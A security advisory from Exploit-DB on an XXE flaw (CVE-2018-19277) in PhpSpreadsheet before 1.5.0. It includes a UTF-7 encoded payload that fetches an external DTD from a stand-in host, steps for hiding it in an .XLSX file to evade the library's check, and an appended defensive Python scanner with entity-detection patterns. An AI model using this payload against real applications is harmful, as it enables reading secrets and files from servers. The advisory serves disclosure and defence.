
PhpSpreadsheet < 1.5.0 - XML External Entity (XXE)

Published: 30 Nov 2018. Reported by: Alex Leahu. Type: exploitdb. Source: www.exploit-db.com


# Product Description
PhpSpreadsheet is a library written in pure PHP that provides a set of classes allowing users to read from and write to different spreadsheet file formats, such as Excel and LibreOffice Calc.

# Vulnerabilities List
One vulnerability was identified within the PhpSpreadsheet library. 

# Affected Version
Versions <=1.5.0

# Solution
Identify when the thread-safe libxmlDisableEntityLoader() function is available and disable the ability to load external entities when it is present. In addition, convert XML encoding to UTF-8 prior to performing a security scan.

This vulnerability is described in the following section.

# XML External Entity (XXE) Injection 
The PhpSpreadsheet library is affected by XXE injection. This vulnerability could be leveraged to read files from a server that hosts an application using this library. An attacker who exploited this vulnerability could extract secrets, passwords, source code, and other sensitive data stored on the filesystem.

# Vulnerability Details
CVE ID: CVE-2018-19277

Access Vector: Network 

Security Risk: High

Vulnerability: CWE-611

CVSS Base Score: 7.7

CVSS vector: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N

The PhpSpreadsheet library implements a security check that halts XML processing if an external entity is detected. An attacker could bypass the check by encoding the XML data as UTF-7 with the following payload:


```
<?xml version="1.0" encoding="UTF-7"?>

<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://127.0.0.1:8080/ext.dtd">%aaa;%ccc;%ddd;]>
```

The payload above can then be stored as a sheet in a .XLSX document. The attacker can then unzip the .XLSX document and replace the contents of the file xl/worksheets/sheet1.xml with the UTF-7 encoded payload. The document containing the new sheet can then be rezipped.

When the PhpSpreadsheet library processes the newly created .XLSX document, the library makes a request to the URL http://127.0.0.1:8080/ext.dtd. A successful HTTP request means that the external entity was successfully processed.
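
The second step of the Solution (normalise the encoding, then scan) can also be applied as a pre-parse screen on uploaded .XLSX files. The following is an added example, not code from PhpSpreadsheet or from the advisory; the function names, the encoding allow-list and the sample parts are assumptions, and the constructed sample declares only a harmless internal entity.

```python
import io
import re
import zipfile

# Encoding pseudo-attribute of an ASCII-readable XML declaration.
DECL = re.compile(rb'<\?xml[^>]*?encoding\s*=\s*["\']([A-Za-z0-9._-]+)["\']')
ALLOWED = {"utf-8", "us-ascii"}          # assumed allow-list for this screen
MARKERS = ("<!DOCTYPE", "<!ENTITY")

def naive_scan(raw: bytes) -> bool:
    """Byte search with no decoding: the kind of check a re-encoded part evades."""
    return any(m.encode() in raw for m in MARKERS)

def check_part(raw: bytes) -> list:
    """Return reasons to reject one XML part (empty list = accepted)."""
    reasons = []
    if b"\x00" in raw:
        reasons.append("NUL bytes (UTF-16/32 content)")
    m = DECL.search(raw[:256])
    declared = m.group(1).decode("ascii").lower() if m else "utf-8"
    if declared not in ALLOWED:
        reasons.append("declared encoding %s not allowed" % declared)
    try:
        text = raw.decode(declared)      # normalise before scanning
    except (LookupError, UnicodeDecodeError):
        reasons.append("undecodable with declared encoding")
        text = raw.decode("latin-1")
    if any(marker in text for marker in MARKERS):
        reasons.append("DTD/entity declaration present")
    return reasons

def scan_xlsx(data: bytes) -> dict:
    """Map each rejected XML part name to its reasons."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        parts = [n for n in zf.namelist() if n.endswith((".xml", ".rels"))]
        results = {n: check_part(zf.read(n)) for n in parts}
    return {n: r for n, r in results.items() if r}

# Constructed sample: benign internal entity, "<" and ">" written in UTF-7.
UTF7_PART = (b'<?xml version="1.0" encoding="UTF-7"?>\n'
             b'+ADw-!DOCTYPE r [+ADw-!ENTITY x "y"+AD4-]+AD4-+ADw-r/+AD4-')
CLEAN_PART = b'<?xml version="1.0" encoding="UTF-8"?><worksheet/>'

def build_sample() -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("xl/worksheets/sheet1.xml", UTF7_PART)
        zf.writestr("xl/workbook.xml", CLEAN_PART)
    return buf.getvalue()
```

The screen fails closed: a part is rejected on its declared encoding alone, so the marker search is a second signal rather than the only one.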
